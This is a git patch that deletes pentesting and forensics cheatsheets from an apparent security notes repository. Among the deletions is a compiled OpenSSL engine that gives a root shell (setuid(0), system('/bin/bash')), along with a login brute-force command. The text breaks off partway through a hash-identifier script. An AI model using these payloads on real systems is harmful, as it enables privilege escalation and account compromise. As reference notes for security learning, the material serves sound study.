From cfa5f355b7306ee4d5aa920c42fcba1d6e336daa Mon Sep 17 00:00:00 2001 From: whx Date: Sat, 12 Nov 2022 23:24:23 +0100 Subject: [PATCH] restructured osint --- .gitmodules | 27 - crypto/openssl/OpenSSL-Cheatsheet.md | 23 - crypto/openssl/openssl_engine.md | 44 -- crypto/rsa.md | 36 -- forensics/ios.md | 32 - forensics/kape.md | 23 - forensics/ntfs.md | 48 -- forensics/oletools.md | 28 - forensics/volatility | 1 - forensics/volatility.md | 91 --- forensics/volatility3 | 1 - forensics/windows_registry.md | 119 ---- hashes/bruteforce/patator | 1 - hashes/bruteforce/patator.md | 23 - hashes/exrex | 1 - hashes/generate_wordlists.md | 48 -- hashes/haiti.md | 6 - hashes/hash-id.py | 592 ------------------ hashes/hash_cracker.py | 20 - hashes/hashcat_utils.md | 24 - hashes/namely | 1 - hashes/password_cracking/colabcat | 1 - hashes/password_cracking/hydra.md | 37 -- hashes/password_cracking/john.md | 43 -- hashes/password_cracking/smb_challenge.md | 19 - hashes/password_cracking/sucrack.md | 8 - hashes/password_cracking/vnc.md | 6 - .../password_guessing/standard_passwords.md | 9 - hashes/wordlistctl | 1 - osint/LeetLinked | 1 - osint/osint_links.txt | 9 - osint/recon_ng.md | 4 - osint/social_engineering/gophish.md | 12 - osint/social_engineering/phishing_domain.md | 5 - osint/spiderfoot.md | 8 - osint/theharvester.md | 4 - persistence/bashrc.md | 8 - persistence/crontab.md | 15 - persistence/meterpreter.md | 6 - persistence/persistence.md | 323 ---------- persistence/wmi.md | 3 - reverse engineering/SCDBG | 1 - reverse engineering/android/misc.md | 81 --- reverse engineering/docs/deobfuscation.md | 97 --- reverse engineering/docs/dll_reversing.md | 9 - reverse engineering/docs/firmware.md | 35 -- reverse engineering/docs/function_mangling.md | 4 - reverse engineering/docs/scada.md | 35 -- reverse engineering/java/krakatau.md | 17 - .../windows/portable-executable.md | 33 - stego/docs/outguess.md | 2 - stego/docs/remnux.md | 24 - stego/docs/stegbrute.md | 9 - stego/docs/steghide.md | 8 - stego/docs/stegoveritas.md | 3 - stego/docs/zsteg.md | 8 - stego/stego-toolkit | 1 - stego/xor_key_file.py | 15 - 58 files changed, 2093 deletions(-) delete mode 100644 crypto/openssl/OpenSSL-Cheatsheet.md delete mode 100644 crypto/openssl/openssl_engine.md delete mode 100644 crypto/rsa.md delete mode 100644 forensics/ios.md delete mode 100644 forensics/kape.md delete mode 100644 forensics/ntfs.md delete mode 100644 forensics/oletools.md delete mode 160000 forensics/volatility delete mode 100644 forensics/volatility.md delete mode 160000 forensics/volatility3 delete mode 100644 forensics/windows_registry.md delete mode 160000 hashes/bruteforce/patator delete mode 100644 hashes/bruteforce/patator.md delete mode 160000 hashes/exrex delete mode 100644 hashes/generate_wordlists.md delete mode 100644 hashes/haiti.md delete mode 100644 hashes/hash-id.py delete mode 100755 hashes/hash_cracker.py delete mode 100644 hashes/hashcat_utils.md delete mode 160000 hashes/namely delete mode 160000 hashes/password_cracking/colabcat delete mode 100644 hashes/password_cracking/hydra.md delete mode 100644 hashes/password_cracking/john.md delete mode 100644 hashes/password_cracking/smb_challenge.md delete mode 100644 hashes/password_cracking/sucrack.md delete mode 100644 hashes/password_cracking/vnc.md delete mode 100644 hashes/password_guessing/standard_passwords.md delete mode 160000 hashes/wordlistctl delete mode 160000 osint/LeetLinked delete mode 100644 osint/osint_links.txt delete mode 100644 osint/recon_ng.md delete mode 100644 osint/social_engineering/gophish.md delete mode 100644 osint/social_engineering/phishing_domain.md delete mode 100644 osint/spiderfoot.md delete mode 100644 osint/theharvester.md delete mode 100644 persistence/bashrc.md delete mode 100644 persistence/crontab.md delete mode 100644 persistence/meterpreter.md delete mode 100644 persistence/persistence.md delete mode 100644 persistence/wmi.md delete mode 160000 reverse engineering/SCDBG delete mode 100644 reverse engineering/android/misc.md delete mode 100644 reverse engineering/docs/deobfuscation.md delete mode 100644 reverse engineering/docs/dll_reversing.md delete mode 100644 reverse engineering/docs/firmware.md delete mode 100644 reverse engineering/docs/function_mangling.md delete mode 100644 reverse engineering/docs/scada.md delete mode 100644 reverse engineering/java/krakatau.md delete mode 100644 reverse engineering/windows/portable-executable.md delete mode 100644 stego/docs/outguess.md delete mode 100644 stego/docs/remnux.md delete mode 100644 stego/docs/stegbrute.md delete mode 100644 stego/docs/steghide.md delete mode 100644 stego/docs/stegoveritas.md delete mode 100644 stego/docs/zsteg.md delete mode 160000 stego/stego-toolkit delete mode 100644 stego/xor_key_file.py diff --git a/.gitmodules b/.gitmodules index cb6af2e..409e0c9 100644 --- a/.gitmodules +++ b/.gitmodules @@ -58,24 +58,12 @@ [submodule "misc/PowerSploit"] path = misc/PowerSploit url = https://github.com/PowerShellMafia/PowerSploit.git -[submodule "hashes/wordlistctl"] - path = hashes/wordlistctl - url = https://github.com/BlackArch/wordlistctl.git -[submodule "forensics/volatility3"] - path = forensics/volatility3 - url = https://github.com/volatilityfoundation/volatility3.git -[submodule "forensics/volatility"] - path = forensics/volatility - url = https://github.com/volatilityfoundation/volatility.git [submodule "exploit/web/content_security_policy/JSONBee"] path = exploit/web/content_security_policy/JSONBee url = https://github.com/zigoo0/JSONBee.git [submodule "post_exploitation/firefox_decrypt"] path = post_exploitation/firefox_decrypt url = https://github.com/unode/firefox_decrypt.git -[submodule "hashes/password_cracking/colabcat"] - path = hashes/password_cracking/colabcat - url = https://github.com/someshkar/colabcat.git [submodule "reverse_shells/php-reverse-shell"] path = reverse_shells/php-reverse-shell url = https://github.com/ivan-sincek/php-reverse-shell.git @@ -133,9 +121,6 @@ [submodule "misc/static-binaries"] path = misc/static-binaries url = https://github.com/andrew-d/static-binaries.git -[submodule "stego/stego-toolkit"] - path = stego/stego-toolkit - url = https://github.com/DominicBreuker/stego-toolkit.git [submodule "exploit/windows/printspoofer"] path = exploit/windows/printspoofer url = https://github.com/dievus/printspoofer.git @@ -160,9 +145,6 @@ [submodule "exploit/linux/dirty_pipe/CVE-2022-0847-dirty-pipe-exploit"] path = exploit/linux/dirty_pipe/CVE-2022-0847-dirty-pipe-exploit url = https://github.com/cspshivam/CVE-2022-0847-dirty-pipe-exploit.git -[submodule "hashes/exrex"] - path = hashes/exrex - url = https://github.com/asciimoo/exrex.git [submodule "exploit/padding/PadBuster"] path = exploit/padding/PadBuster url = https://github.com/AonCyberLabs/PadBuster.git @@ -172,12 +154,6 @@ [submodule "post_exploitation/bc_security/Empire"] path = post_exploitation/bc_security/Empire url = https://github.com/BC-SECURITY/Empire.git -[submodule "osint/LeetLinked"] - path = osint/LeetLinked - url = https://github.com/Sq00ky/LeetLinked.git -[submodule "hashes/namely"] - path = hashes/namely - url = https://github.com/OrielOrielOriel/namely [submodule "misc/level3_hypervisor/kubeletctl"] path = misc/level3_hypervisor/kubeletctl url = https://github.com/cyberark/kubeletctl.git @@ -247,6 +223,3 @@ [submodule "exploit/level3_hypervisor/kubeletctl"] path = exploit/level3_hypervisor/kubeletctl url = https://github.com/cyberark/kubeletctl.git -[submodule "hashes/bruteforce/patator"] - path = hashes/bruteforce/patator - url = https://github.com/lanjelot/patator.git diff --git a/crypto/openssl/OpenSSL-Cheatsheet.md b/crypto/openssl/OpenSSL-Cheatsheet.md deleted file mode 100644 index 964d99b..0000000 --- a/crypto/openssl/OpenSSL-Cheatsheet.md +++ /dev/null @@ -1,23 +0,0 @@ -# OpenSSL Cheatsheet - -## Extract keys from PFX Cert - -* Key and cert form PFX -```sh -openssl pkcs12 -in cert.pfx -nocerts -out key.pem -nodes -openssl pkcs12 -in cert.pfx -out cert.pem -clcerts -nokeys -``` - -## Extract & Repack PFX Cert - -* Extract & Repack with another password, e.g. from `mimikatz` to `cqure` -```sh -openssl pkcs12 -in *.pfx -out temp.pem -nodes -openssl pkcs12 -export -out *.pfx -in temp.pem -``` - -## Generate Certificate - -```sh -openssl req -new -x509 -keyout cert.pem -out cert.pem -days 365 -nodes -``` diff --git a/crypto/openssl/openssl_engine.md b/crypto/openssl/openssl_engine.md deleted file mode 100644 index 98363d9..0000000 --- a/crypto/openssl/openssl_engine.md +++ /dev/null @@ -1,44 +0,0 @@ -# OpenSSL Engine - -* Hook external libs -* [OpenSSL blog](https://www.openssl.org/blog/blog/2015/10/08/engine-building-lesson-1-a-minimum-useless-engine/) - -* Most minimal example -```C -#include - -static int bind(ENGINE *e, const char *id) -{ - return 1; -} - -IMPLEMENT_DYNAMIC_BIND_FN(bind) -IMPLEMENT_DYNAMIC_CHECK_FN() -``` - -* Shell as root -```C -#include -#include - -static int bind(ENGINE *e, const char *id) -{ - setuid(0); - setgid(0); - system("/bin/bash"); -} - -IMPLEMENT_DYNAMIC_BIND_FN(bind) -IMPLEMENT_DYNAMIC_CHECK_FN() -``` - -* Compile -```C -gcc -fPIC -o rootshell.o -c rootshell.c -gcc -shared -o rootshell.so -c -lcrytpo rootshell.o -``` - -* Execute via -```sh -openssl engine -t `pwd`/rootshell.so -``` diff --git a/crypto/rsa.md b/crypto/rsa.md deleted file mode 100644 index 66c4f5d..0000000 --- a/crypto/rsa.md +++ /dev/null @@ -1,36 +0,0 @@ -# RSA - -* `p * q = n` -* Coprime Phi is calculated either by [Euler Totient](https://en.wikipedia.org/wiki/Euler's_totient_function) or [greatest common divisor](https://en.wikipedia.org/wiki/Greatest_common_divisor) via [euclidean algorithm](https://crypto.stanford.edu/pbc/notes/numbertheory/euclid.html) -* \\(1 < $\phi$ < n \\) -* There is also $\phi$ = (p-1) * (q-1) - -* Encryption, public key `e` is a prime between 2 and phi --> \\( 2 < e < $\phi$ \\) -```python -possible_e = [] -for i in range (2, phi): - if gcd(n, i) == 1 and gcd(phi, i) == 1: - possible_e.append() -``` - -* Decryption, private key `d` --> \\( d * e mod $\phi$ = 1 \\) -```python -possible_d = [] -for i in range (phi + 1, phi + foo): - if i * e mod phi == 1 : - possible_d.append() -``` -* \\( Cipher = msg ** d mod $\phi$ \\) -* \\( Cleartext = cipher ** e mod $\phi$ ) - -## Euklid -```python -def gcd(a, b): - if b == 0: - return a - return gcd(b, a % b) -``` - -## Links - -* [Encryption+Decryption](https://www.cs.drexel.edu/~jpopyack/Courses/CSP/Fa17/notes/10.1_Cryptography/RSA_Express_EncryptDecrypt_v2.html) diff --git a/forensics/ios.md b/forensics/ios.md deleted file mode 100644 index 642ba92..0000000 --- a/forensics/ios.md +++ /dev/null @@ -1,32 +0,0 @@ -# iOS Devices - -## Trust Certificates -* Exchanged between 'Trusted' devices and the charging iOS device. -* iTunes access to the iOS device has elevated permissions using the cert. -* Keychain may be extracted through iTunes. - -## Interesting Files -* `ResetCounter.plist`, hard Reset diagnostic counter -* `com.apple.preferences.datetime.plist` -* DB tables - * Atendee - * Task - * Event -* Mail -* Safari -* Cookies -* Pictures -* Addressbook -* SMS -* Voicemail -* WiFi Keys - -## Backups -Encrypted and unencrypted backups can be chosen in the iTunes menu. - - -## Tools -* [iFunbox](https://www.i-funbox.com/en/page-about-us.html) -* [O.MG cable](https://shop.hak5.org/products/o-mg-cable) - - diff --git a/forensics/kape.md b/forensics/kape.md deleted file mode 100644 index d79bf8c..0000000 --- a/forensics/kape.md +++ /dev/null @@ -1,23 +0,0 @@ -# Kroll Artifact Parser - -* Collect and processes artifacts on windows -* Collects from live systems, mounted images and F-response tool - -## Targets - -* Needs source and target directory, as well as a module to process the files on -* `Target` copies a file into a repository -* `*.tkape` files contains metadata of the files to copy -* `Compound Targets` contain metadata of multiple files in order to get a result quicker -* `!Disable` do not appear in the target list -* `!Local` keep on local - - -## Modules - -* Used on the targeted files -* `*.mkape` files -* Additional binaries are kept in `bin` - - - diff --git a/forensics/ntfs.md b/forensics/ntfs.md deleted file mode 100644 index 6ef15ce..0000000 --- a/forensics/ntfs.md +++ /dev/null @@ -1,48 +0,0 @@ -# NTFS - -* Has the following advantages over FAT - * Journaling - * ACL - * Volume Shadow Copy - * Alternate Data Stream - -## Master File Table -* VBR references to `$MFT` -* `$LOGFILE` stores transactions of the file system -* `$UsnJrnl` changed files, and reason for change - -## Caching - -* File information is cached for frequent use in -```sh -C:\Windows\Prefetch\*.pf -``` -* An SQLite database can be found under -```sh -C:\Users\\AppData\Local\ConnectedDevicesPlatform\{randomfolder}\ActivitiesCache.db -``` - -## Jumplist - -* Stores recently used files of applications inside the taskbar -```sh -C:\Users\\AppData\Roaming\Microsoft\Windows\Recent\AutomaticDestinations -``` - -## Shortcut Files -```sh -C:\Users\\AppData\Roaming\Microsoft\Windows\Recent\ -C:\Users\\AppData\Roaming\Microsoft\Office\Recent\ -``` - -## Internet Explorer History -```sh -C:\Users\\AppData\Local\Microsoft\Windows\WebCache\WebCacheV*.dat -``` - -## Removeable Device Setup Log -```sh -C:\Windows\inf\setupapi.dev.log -``` - - diff --git a/forensics/oletools.md b/forensics/oletools.md deleted file mode 100644 index 251843e..0000000 --- a/forensics/oletools.md +++ /dev/null @@ -1,28 +0,0 @@ -# oletools & Vmonkey - -* Analyze ooxml and ole2 files - -* [oletools repo](https://github.com/decalage2/oletools.git) - -## Usage - -* Check content of a stream -```sh -oledump.py file.doc -Ss -oledump.py file.doc -Ss -v -``` -```sh -oledump.py -i file.doc -``` -```sh -olevba file.doc -``` - -## Vipermonkey -* For the lazy ones -```sh -vmonkey file.doc -``` - -## scdbg -* [scdbg repo](https://github.com/dzzie/SCDBG.git) diff --git a/forensics/volatility b/forensics/volatility deleted file mode 160000 index a438e76..0000000 --- a/forensics/volatility +++ /dev/null @@ -1 +0,0 @@ -Subproject commit a438e768194a9e05eb4d9ee9338b881c0fa25937 diff --git a/forensics/volatility.md b/forensics/volatility.md deleted file mode 100644 index 3809f95..0000000 --- a/forensics/volatility.md +++ /dev/null @@ -1,91 +0,0 @@ -# Volatility - -Search through collected volatile memory dumps, volume and VM images. -Volatility and Volatility 3 have a different syntax. The older one has -higher malware hunting abilities. - -* [Cheat sheet](https://downloads.volatilityfoundation.org/releases/2.4/CheatSheet_v2.4.pdf) -* [Hacktricks shee](https://book.hacktricks.xyz/forensics/volatility-examples) -* [Symbol table for Linux and macOS](https://github.com/volatilityfoundation/volatility3#symbol-tables) - -## Basic Commands - -* Basic Info, find OS profile -```sh -volatility -f imageinfo -volatility -f kdbgscan -``` -* Process list -```sh -volatility -f --profile pslist -``` -* List dlls -```sh -volatility -f --profile dlllist -p -``` -* Last accessed dir -```sh -volatility -f --profile shellbags -``` - -### Volatility3 - -* Basic Info works too, but you have to know the kind of OS anyway -```sh -volatility -f windows.info -``` - -* Process list, but processes can be hidden. Therefore use ` psscan ` -```sh -volatility -f windows.pslist -volatility -f windows.psscan -volatility -f windows.pstree -``` - -* List dlls, this includes the path of the file -```sh -volatility -f windows.dlllist -``` - -* Find malicious files, fileless and including files, respectively -```sh -volatility -f windows.malfind -volatility -f windows.vadyarascan -``` - -* Dump memory map -```sh -volatility -f windows.memmap.Memmap --pid --dump -``` - -* Dump and scan files -```sh -windows.dumpfiles.DumpFiles Dumps cached file contents from Windows memory -windows.filescan.FileScan Scans for file objects present in a particular windows. Lists version information from PE files. -``` - -* Find file handles or mutex -```sh -volatility -f windows.mutex -``` - -* Malware hunting through hooking -```sh -windows.ssdt.SSDT Lists the system call table. # System Service Descriptor Table -windows.driverirp.DriverIrp List IRPs for drivers in a particular windows memory image. -windows.modules.Modules Lists the loaded kernel modules. -windows.driverscan.DriverScan Scans for drivers present in a particular windows -``` - - -## Plugins - -Volatility 3 plugins are named after the specific profile they are used for. -For the most part these are (` macOS.*, windows.*, linux.* `) - -* For example - * Truecryptpassphrase - * cmdscan, command history - * shutdowntime - - diff --git a/forensics/volatility3 b/forensics/volatility3 deleted file mode 160000 index f821ac6..0000000 --- a/forensics/volatility3 +++ /dev/null @@ -1 +0,0 @@ -Subproject commit f821ac60721047dd7b8832724b28e1383903199c diff --git a/forensics/windows_registry.md b/forensics/windows_registry.md deleted file mode 100644 index 7e141f7..0000000 --- a/forensics/windows_registry.md +++ /dev/null @@ -1,119 +0,0 @@ -# Windows Registry - -## Regedit Keys -* HKEY_CURRENT_USER (HKCU), inside HKU -* HKEY_USERS (HKU) -* HKEY_LOCAL_MACHINE (HKLM) -* HKEY_CLASSES_ROOT (HKCR), stored in HKLM and HKU - * `HKEY_CURREN_USER\Software\Classes` for settings of interactive user - * `HKEY_LOCAL_MACHINE\Software\Classes` to change default settings -* HKEY_CURRENT_CONFIG - -## Paths -* `C:\Windows\System32\Config` - * Default -> `HKEY_USERS\DEFAULT` - * SAM -> `HKEY_LOCAL_MACHINE\SAM` - * SECURITY -> `HKEY_LOCAL_MACHINE\Security` - * SOFTWARE -> `HKEY_LOCAL_MACHINE\Software` - * SYSTEM -> `HKEY_LOCAL_MACHINE\System` - -* `C:\Users\\` - * NTUSER.DAT -> `HKEY_CURRENT_USER` , hidden file -* `C:\Users\\AppData\Local\Microsoft\Windows` - * USRCLASS.DAT -> `HKEY_CURRENT_USER\Sofware\CLASSES`, hidden file - -* `C:\Windows\AppCompat\Programs\Amcache.hve` - -### Transaction Logs -* Transaction `.LOG` of the registry hive -* Saved inside the same directory which is `C:\Windows\System32\Config`, as the hive which was altered. - -### Backups -* Saved every ten days -* Look out for recently deleted or modified keys -* `C:\Windows\System32\Config\RegBack` - -## Data Acquisition -* Tools - * [Autopsy](https://www.autopsy.com/) - * [FTK Imager](https://www.exterro.com/ftk-imager), does not copy `Amcache.hve` - * [KAPE](https://www.kroll.com/en/services/cyber-risk/incident-response-litigation-support/kroll-artifact-parser-extractor-kape), preserves directory tree - * `Registry Viewer` - * `Zimmerman's Registry Explorer`, uses transaction logs as well - * ` AppCompatCache Parser` - * `RegRipper`, cli and gui - -## System Information -* OS Version -> `SOFTWARE\Microsoft\Windows NT\CurrentVersion` -* Computer Name -> `SYSTEM\CurrentControlSet\Control\ComputerName\ComputerName` -* Time Zone `SYSTEM\CurrentControlSet\Control\TimeZoneInformation` -* Network Interfaces -> `SYSTEM\CurrentControlSet\Services\Tcpip\Parameters\Interfaces` -* Past connected networks -> `SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkList\Signatures\Unmanaged` and `SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkList\Signatures\Managed` -* Services -> `SYSTEM\CurrentControlSet\Services` - * Service will start at boot with `start` key value `0x02` -* Users, SAM -> `SAM\Domains\Account\Users` - - -### Control Sets -* `ControlSet001` -> last boot -* `ControlSet002` -> last known good -* `HKLM\SYSTEM\CurrentControlSet` -> live - -* Can be found under: - * `SYSTEM\Select\Current` shows the used control set - * `SYSTEM\Select\LastKnownGood` - -## Autostart Programs -* `NTUSER.DAT\Software\Microsoft\Windows\CurrentVersion\Run` -* `NTUSER.DAT\Software\Microsoft\Windows\CurrentVersion\RunOnce` -* `SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce` -* `SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\Run` -* `SOFTWARE\Microsoft\Windows\CurrentVersion\Run` - -## Recent Files -* `NTUSER.DAT\Software\Microsoft\Windows\CurrentVersion\Explorer\RecentDocs`, e.g. xml, pdf, jpg -* Office files -> `NTUSER.DAT\Software\Microsoft\Office\VERSION`, `NTUSER.DAT\Software\Microsoft\Office\15.0\Word` -* Office 365 -> `NTUSER.DAT\Software\Microsoft\Office\VERSION\UserMRU\LiveID_####\FileMRU` - -## ShellBags -* `USRCLASS.DAT\Local Settings\Software\Microsoft\Windows\Shell\Bags` -* `USRCLASS.DAT\Local Settings\Software\Microsoft\Windows\Shell\BagMRU` -* `NTUSER.DAT\Software\Microsoft\Windows\Shell\BagMRU` -* `NTUSER.DAT\Software\Microsoft\Windows\Shell\Bags` - -## Last Open/Saved/Visited Dialog MRUs -* `NTUSER.DAT\Software\Microsoft\Windows\CurrentVersion\Explorer\ComDlg32\OpenSavePIDlMRU` -* `NTUSER.DAT\Software\Microsoft\Windows\CurrentVersion\Explorer\ComDlg32\LastVisitedPidlMRU` - -## Explorer Address/Search Bars -* `NTUSER.DAT\Software\Microsoft\Windows\CurrentVersion\Explorer\TypedPaths` -* `NTUSER.DAT\Software\Microsoft\Windows\CurrentVersion\Explorer\WordWheelQuery` - -## User Assist -* GUI applications launched by the user -* `NTUSER.DAT\Software\Microsoft\Windows\Currentversion\Explorer\UserAssist\{GUID}\Count` - -## Shim Cache -* Application Compatibility, AppCompatCache -* `SYSTEM\CurrentControlSet\Control\Session Manager\AppCompatCache` -* Use `AppCompatCacheParser.exe --csv -f -c ` - -### AmCache -* Information about recently run applications on the system -* `C:\Windows\appcompat\Programs\Amcache.hve` -* Last executed app -> `Amcache.hve\Root\File\{Volume GUID}\` -* Saves SHA1 of the last executed app - -## Background Activity Monitor/Desktop Activity Moderator BAM/DAM -* Saves full path of executed apps -* `SYSTEM\CurrentControlSet\Services\bam\UserSettings\{SID}` -* `SYSTEM\CurrentControlSet\Services\dam\UserSettings\{SID}` - -## Devices -* Identification - * USB -> `SYSTEM\CurrentControlSet\Enum\USBTOR`, `SYSTEM\CurrentControlSet\Enum\USB` -* Device name -> `SOFTWARE\Microsoft\Windows Portable Devices\Devices` -* First time connected -> `SYSTEM\CurrentControlSet\Enum\USBSTOR\Ven_Prod_Version\USBSerial#\Properties\{83da6326-97a6-4088-9453-a19231573b29}\0064` -* Last time connected -> `SYSTEM\CurrentControlSet\Enum\USBSTOR\Ven_Prod_Version\USBSerial#\Properties\{83da6326-97a6-4088-9453-a19231573b29}\0066` -* Last removal time -> `SYSTEM\CurrentControlSet\Enum\USBSTOR\Ven_Prod_Version\USBSerial#\Properties\{83da6326-97a6-4088-9453-a19231573b29}\0067` - diff --git a/hashes/bruteforce/patator b/hashes/bruteforce/patator deleted file mode 160000 index 4690822..0000000 --- a/hashes/bruteforce/patator +++ /dev/null @@ -1 +0,0 @@ -Subproject commit 46908228cc85fbc032426a12d048fa372e213da4 diff --git a/hashes/bruteforce/patator.md b/hashes/bruteforce/patator.md deleted file mode 100644 index ad1a363..0000000 --- a/hashes/bruteforce/patator.md +++ /dev/null @@ -1,23 +0,0 @@ -# Patator Bruteforcing - -* [Lanjelot's Repo](https://github.com/lanjelot/patator/) - -## Modules - -* Available modules can be found under `patator --help` -* Module specifics can be found via `patator -h` - -## Using a Module - -* For example `http_fuzz` can be used via -```sh -TARGET_IP=10.0.47.11 -CSRF=$(curl -s -c stored.cookie "${IP}/login.php" | awk -F 'value=' '/user_token/ {print $2}' | cut -d "'" -f2) -SESSION_ID=$(grep PHPSESSID stored.cookie | awk -F ' ' '{print $7}') - -echo "The CSRF is: $CSRF" -echo "The PHPSESSID is: $SESSION_ID" - -patator.py http_fuzz method=POST --threads=64 timeout=10 url="http://${TARGET_IP}/login.php" 0=passwords.txt body="username=admin&password=FILE0&Login=Login&user_token=${CSRF}" header="Cookie: PHPSESSID=${SESSION_ID}; security=impossible" -x quit:fgrep!=login.php -x ignore:fgrep='Location: login.php' -x -``` - diff --git a/hashes/exrex b/hashes/exrex deleted file mode 160000 index 9a66706..0000000 --- a/hashes/exrex +++ /dev/null @@ -1 +0,0 @@ -Subproject commit 9a66706e7582a9cf31c4121629c9035e329bbe21 diff --git a/hashes/generate_wordlists.md b/hashes/generate_wordlists.md deleted file mode 100644 index 40899ab..0000000 --- a/hashes/generate_wordlists.md +++ /dev/null @@ -1,48 +0,0 @@ -# Generate Wordlists - -* [username_generator](https://github.com/therodri2/username_generator.git) -* [CeWL](../enumeration/CeWL/README.md) -* [Mentalist](https://github.com/sc0tfree/mentalist.git) -* [lyricpass](https://github.com/initstring/lyricpass.git) -* [pnwgen phonenumbers](https://github.com/toxydose/pnwgen.git) - - -## Cupp - -* [cupp](https://github.com/Mebus/cupp.git) - * Interactive dialogue via `cupp.py -i` - * Wordlistdownload via `cupp.py -l` - * Connections to alecto DB via `-a` - -## crunch - -```sh -crunch -o -``` - -* Option `-t` specifies variable characters - * `@`, lower case alpha characters - * `,`, upper case alpha characters - * `%`, numeric characters - * `^`, special characters including space -```sh -crunch 8 8 -t passw%%rd -``` - -## ttpassgen -* [ttpassgen](https://github.com/tp7309/TTPassGen.git) -* Generate lists from the ground up -* `pip install ttpassgen` -```sh -ttpassgen --rule '[?d]{6:6:*}' 6digitpins.txt -``` -```sh -ttpassgen --rule '[?l]{1:5:*}' all_letter_combinations.txt -``` -```sh -ttpassgen --dictlist "in.txt,in2.txt" --rule '$0[_]?$1' -s " " out.txt -``` - -# exrex - -* Generate all possible outcomes from regex string diff --git a/hashes/haiti.md b/hashes/haiti.md deleted file mode 100644 index 5af9a7d..0000000 --- a/hashes/haiti.md +++ /dev/null @@ -1,6 +0,0 @@ -# haiti - -* Hash Identifier -```sh -haiti -``` diff --git a/hashes/hash-id.py b/hashes/hash-id.py deleted file mode 100644 index 6efb601..0000000 --- a/hashes/hash-id.py +++ /dev/null @@ -1,592 +0,0 @@ -#!/usr/bin/env python -# encoding: utf-8 -# Hash Identifier -# By Zion3R -# www.Blackploit.com -# Root@Blackploit.com - -from builtins import input -from sys import argv, exit - -version = 1.2 - -logo=''' ######################################################################### - # __ __ __ ______ _____ # - # /\ \/\ \ /\ \ /\__ _\ /\ _ `\ # - # \ \ \_\ \ __ ____ \ \ \___ \/_/\ \/ \ \ \/\ \ # - # \ \ _ \ /'__`\ / ,__\ \ \ _ `\ \ \ \ \ \ \ \ \ # - # \ \ \ \ \/\ \_\ \_/\__, `\ \ \ \ \ \ \_\ \__ \ \ \_\ \ # - # \ \_\ \_\ \___ \_\/\____/ \ \_\ \_\ /\_____\ \ \____/ # - # \/_/\/_/\/__/\/_/\/___/ \/_/\/_/ \/_____/ \/___/ v'''+str(version)+''' # - # By Zion3R # - # www.Blackploit.com # - # Root@Blackploit.com # - #########################################################################''' - -algorithms={"102020":"ADLER-32", "102040":"CRC-32", "102060":"CRC-32B", "101020":"CRC-16", "101040":"CRC-16-CCITT", "104020":"DES(Unix)", "101060":"FCS-16", "103040":"GHash-32-3", "103020":"GHash-32-5", "115060":"GOST R 34.11-94", "109100":"Haval-160", "109200":"Haval-160(HMAC)", "110040":"Haval-192", "110080":"Haval-192(HMAC)", "114040":"Haval-224", "114080":"Haval-224(HMAC)", "115040":"Haval-256", "115140":"Haval-256(HMAC)", "107080":"Lineage II C4", "106025":"Domain Cached Credentials - MD4(MD4(($pass)).(strtolower($username)))", "102080":"XOR-32", "105060":"MD5(Half)", "105040":"MD5(Middle)", "105020":"MySQL", "107040":"MD5(phpBB3)", "107060":"MD5(Unix)", "107020":"MD5(Wordpress)", "108020":"MD5(APR)", "106160":"Haval-128", "106165":"Haval-128(HMAC)", "106060":"MD2", "106120":"MD2(HMAC)", "106040":"MD4", "106100":"MD4(HMAC)", "106020":"MD5", "106080":"MD5(HMAC)", "106140":"MD5(HMAC(Wordpress))", "106029":"NTLM", "106027":"RAdmin v2.x", "106180":"RipeMD-128", "106185":"RipeMD-128(HMAC)", "106200":"SNEFRU-128", "106205":"SNEFRU-128(HMAC)", "106220":"Tiger-128", "106225":"Tiger-128(HMAC)", "106240":"md5($pass.$salt)", "106260":"md5($salt.'-'.md5($pass))", "106280":"md5($salt.$pass)", "106300":"md5($salt.$pass.$salt)", "106320":"md5($salt.$pass.$username)", "106340":"md5($salt.md5($pass))", "106360":"md5($salt.md5($pass).$salt)", "106380":"md5($salt.md5($pass.$salt))", "106400":"md5($salt.md5($salt.$pass))", "106420":"md5($salt.md5(md5($pass).$salt))", "106440":"md5($username.0.$pass)", "106460":"md5($username.LF.$pass)", "106480":"md5($username.md5($pass).$salt)", "106500":"md5(md5($pass))", "106520":"md5(md5($pass).$salt)", "106540":"md5(md5($pass).md5($salt))", "106560":"md5(md5($salt).$pass)", "106580":"md5(md5($salt).md5($pass))", "106600":"md5(md5($username.$pass).$salt)", "106620":"md5(md5(md5($pass)))", "106640":"md5(md5(md5(md5($pass))))", "106660":"md5(md5(md5(md5(md5($pass)))))", "106680":"md5(sha1($pass))", "106700":"md5(sha1(md5($pass)))", "106720":"md5(sha1(md5(sha1($pass))))", "106740":"md5(strtoupper(md5($pass)))", "109040":"MySQL5 - SHA-1(SHA-1($pass))", "109060":"MySQL 160bit - SHA-1(SHA-1($pass))", "109180":"RipeMD-160(HMAC)", "109120":"RipeMD-160", "109020":"SHA-1", "109140":"SHA-1(HMAC)", "109220":"SHA-1(MaNGOS)", "109240":"SHA-1(MaNGOS2)", "109080":"Tiger-160", "109160":"Tiger-160(HMAC)", "109260":"sha1($pass.$salt)", "109280":"sha1($salt.$pass)", "109300":"sha1($salt.md5($pass))", "109320":"sha1($salt.md5($pass).$salt)", "109340":"sha1($salt.sha1($pass))", "109360":"sha1($salt.sha1($salt.sha1($pass)))", "109380":"sha1($username.$pass)", "109400":"sha1($username.$pass.$salt)", "1094202":"sha1(md5($pass))", "109440":"sha1(md5($pass).$salt)", "109460":"sha1(md5(sha1($pass)))", "109480":"sha1(sha1($pass))", "109500":"sha1(sha1($pass).$salt)", "109520":"sha1(sha1($pass).substr($pass,0,3))", "109540":"sha1(sha1($salt.$pass))", "109560":"sha1(sha1(sha1($pass)))", "109580":"sha1(strtolower($username).$pass)", "110020":"Tiger-192", "110060":"Tiger-192(HMAC)", "112020":"md5($pass.$salt) - Joomla", "113020":"SHA-1(Django)", "114020":"SHA-224", "114060":"SHA-224(HMAC)", "115080":"RipeMD-256", "115160":"RipeMD-256(HMAC)", "115100":"SNEFRU-256", "115180":"SNEFRU-256(HMAC)", "115200":"SHA-256(md5($pass))", "115220":"SHA-256(sha1($pass))", "115020":"SHA-256", "115120":"SHA-256(HMAC)", "116020":"md5($pass.$salt) - Joomla", "116040":"SAM - (LM_hash:NT_hash)", "117020":"SHA-256(Django)", "118020":"RipeMD-320", "118040":"RipeMD-320(HMAC)", "119020":"SHA-384", "119040":"SHA-384(HMAC)", 